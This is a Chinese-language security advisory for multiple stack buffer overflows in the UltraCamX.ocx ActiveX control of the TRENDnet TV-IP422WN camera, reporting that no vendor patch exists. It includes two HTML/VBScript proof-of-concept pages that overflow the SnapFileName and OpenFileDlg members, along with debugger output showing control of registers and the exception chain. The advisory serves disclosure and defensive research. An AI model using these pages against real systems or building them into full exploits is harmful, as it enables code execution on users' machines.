TRENDnet TV-IP422WN \'UltraCamX.ocx\'多个栈缓冲区溢出漏洞
发表日期:2014-12-05 10:38:44
TRENDnet TV-IP422WN \'UltraCamX.ocx\'多个栈缓冲区溢出漏洞
BugTraq-ID:71292
发布日期:2014-11-25
更新日期:2014-11-26
受影响系统:
trendnet TV-IP422WN
详细信息:
TRENDnet TV-IP422WN是网络摄相机产品。 TRENDnet TV-IP422WN在实现上存在多个栈缓冲区溢出漏洞,攻击者可利用这些漏洞在受影响应用上下文中执行任意代码。
来源:
Gjoko Krstic (liquidworm@gmail.com)
测试方法:
警告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!<html> <object classid=\'clsid:E1B26101-23FB-4855-9171-F79F29CC7728\' id=\'target\' /> <script language=\'vbscript\'> targetFile = "C:\\Windows\\Downloaded Program Files\\UltraCamX.ocx" prototype = "Property Let SnapFileName As String" memberName = "SnapFileName" progid = "UltraCamLib.UltraCamX" argCount = 1 thricer=String(8212, "A") target.SnapFileName = thricer </script> </html> -- eax=41414141 ebx=00809590 ecx=41414141 edx=031e520f esi=0080c4d4 edi=00000009 eip=1002228c esp=003befb4 ebp=003befbc iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206 UltraCamX!DllUnregisterServer+0x109bc: 1002228c 0fb64861 movzx ecx,byte ptr [eax+61h] ds:002b:414141a2=?? -- <html> <object classid=\'clsid:E1B26101-23FB-4855-9171-F79F29CC7728\' id=\'target\' /> <script language=\'vbscript\'> targetFile = "C:\\Windows\\Downloaded Program Files\\UltraCamX.ocx" prototype = "Function OpenFileDlg ( ByVal sFilter As String ) As String" memberName = "OpenFileDlg" progid = "UltraCamLib.UltraCamX" argCount = 1 thricer=String(2068, "A") target.OpenFileDlg thricer </script> </html> -- 0:000> r eax=41414141 ebx=100ceff4 ecx=0042df38 edx=00487900 esi=00487a1c edi=0042e9fc eip=100203fb esp=0042d720 ebp=0042e9a8 iopl=0 nv up ei pl nz ac po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210212 UltraCamX!DllUnregisterServer+0xeb2b: 100203fb 8b48e0 mov ecx,dword ptr [eax-20h] ds:002b:41414121=???????? 0:000> !exchain 0042eda8: 41414141 Invalid exception stack at 41414141 --
解决办法:
厂商补丁:
trendnet
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.trendnet.com/support/supportdetail.asp?prod=190_TV-IP422WN